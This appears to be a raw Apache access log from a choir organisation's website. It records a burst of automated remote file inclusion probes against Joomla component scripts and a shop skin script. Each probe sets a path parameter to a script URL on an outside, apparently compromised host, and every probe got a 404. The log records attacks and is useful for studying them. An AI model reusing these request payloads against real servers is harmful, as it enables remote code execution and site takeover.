210.204.38.42 - - [09/Mar/2010:07:48:12 -0800] "GET /logs/access_100115.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:48:40 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:48:40 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:48:40 -0800] "GET /logs/access_100115.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:49:13 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:49:13 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:07:49:13 -0800] "GET /logs/access_100115.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.157.211.204 - - [09/Mar/2010:07:50:33 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.157.211.204 - - [09/Mar/2010:07:50:33 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.157.211.204 - - [09/Mar/2010:07:50:33 -0800] "GET /logs/access_100228.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:07:54:31 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:07:54:31 -0800] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:07:54:36 -0800] "GET /logs/access_091213.log%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:07:54:38 -0800] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:07:54:39 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:07:54:43 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:07:54:43 -0800] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:07:54:43 -0800] "GET /logs/access_091213.log%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:07:54:47 -0800] "GET /logs/access_091213.log%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.195.112.249 - - [09/Mar/2010:07:55:19 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:07:55:36 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:07:55:36 -0800] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
151.8.79.19 - - [09/Mar/2010:07:55:38 -0800] "GET /advanced_comment_system/admin.php?ACS_path=http://www.barcamenando.it/open.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
151.8.79.19 - - [09/Mar/2010:07:55:38 -0800] "GET /logs//advanced_comment_system/admin.php?ACS_path=http://www.barcamenando.it/open.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:07:55:42 -0800] "GET /logs/access_091213.log%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:07:55:51 -0800] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:07:55:51 -0800] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:07:55:55 -0800] "GET /logs/access_091213.log%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
164.77.228.201 - - [09/Mar/2010:07:58:30 -0800] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
164.77.228.201 - - [09/Mar/2010:07:58:30 -0800] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
164.77.228.201 - - [09/Mar/2010:07:58:36 -0800] "GET /logs/access_100131.log//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
164.77.228.201 - - [09/Mar/2010:07:58:53 -0800] "GET /administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
164.77.228.201 - - [09/Mar/2010:07:58:54 -0800] "GET /logs/access_100131.log//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
164.77.228.201 - - [09/Mar/2010:07:58:54 -0800] "GET /logs//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:07:59:43 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:07:59:43 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:07:59:43 -0800] "GET /logs/access_100130.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:07:59:45 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:07:59:45 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:07:59:45 -0800] "GET /logs/access_100130.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:00:11 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:00:11 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:00:11 -0800] "GET /logs/access_100130.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:00:13 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:00:16 -0800] "GET /logs/access_100126.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:00:18 -0800] "GET /logs/access_100126.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:08:00:25 -0800] "GET /logs/access_091029.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:08:00:44 -0800] "GET /logs/access_091029.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.142.61.173 - - [09/Mar/2010:08:00:49 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:08:00:52 -0800] "GET /logs/access_091029.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:08:00:54 -0800] "GET /logs/access_091029.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:08:00:55 -0800] "GET /logs/access_091029.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.142.61.173 - - [09/Mar/2010:08:00:55 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:00:57 -0800] "GET /logs/access_100126.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:00:59 -0800] "GET /logs/access_100126.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.142.61.173 - - [09/Mar/2010:08:01:05 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:01:42 -0800] "GET /logs/access_100130.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:08:02:06 -0800] "GET /logs/access_100116.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:08:02:15 -0800] "GET /logs/access_091029.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:08:02:24 -0800] "GET /logs/access_091029.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:08:02:35 -0800] "GET /logs/access_091029.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:02:38 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:02:38 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:02:38 -0800] "GET /logs/access_100101.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:02:38 -0800] "GET /logs/access_100112.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:02:45 -0800] "GET /logs/access_100130.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:02:46 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:02:46 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:02:46 -0800] "GET /logs/access_100101.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:02:46 -0800] "GET /logs/access_100112.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:08:02:55 -0800] "GET /logs/access_100116.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:02:56 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:02:56 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:02:56 -0800] "GET /logs/access_100101.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:08:02:56 -0800] "GET /logs/access_100112.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
174.142.61.173 - - [09/Mar/2010:08:02:56 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.americanboyschoir.com"
174.142.61.173 - - [09/Mar/2010:08:02:57 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.americanboyschoir.com"
174.142.61.173 - - [09/Mar/2010:08:02:57 -0800] "GET /logs/access.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.trilk.com/phpcookbook//rise.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:08:03:06 -0800] "GET /logs/access_100116.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:03:12 -0800] "GET /logs/access_100130.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:08:03:15 -0800] "GET /logs/access_100116.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:08:03:24 -0800] "GET /logs/access_100130.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:08:03:27 -0800] "GET /logs/access_100116.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:08:04:44 -0800] "GET /logs/access_100116.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:08:04:47 -0800] "GET /logs/access_100116.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:08:04:56 -0800] "GET /logs/access_100116.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
164.77.228.201 - - [09/Mar/2010:08:05:06 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
64.15.158.246 - - [09/Mar/2010:08:05:06 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://0919f.com//shop/data/log/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.americanboyschoir.com"
164.77.228.201 - - [09/Mar/2010:08:05:40 -0800] "GET /logs/access_100131.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:08:05:43 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:08:05:43 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:08:05:43 -0800] "GET /logs/access_100101.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:08:05:44 -0800] "GET /logs/access_100112.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:08:06:08 -0800] "GET /logs/access_100101.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:08:06:08 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:08:06:08 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.194 - - [09/Mar/2010:08:06:08 -0800] "GET /logs/access_100112.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
164.77.228.201 - - [09/Mar/2010:08:06:55 -0800] "GET /logs/access_100202.log%20%20//administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
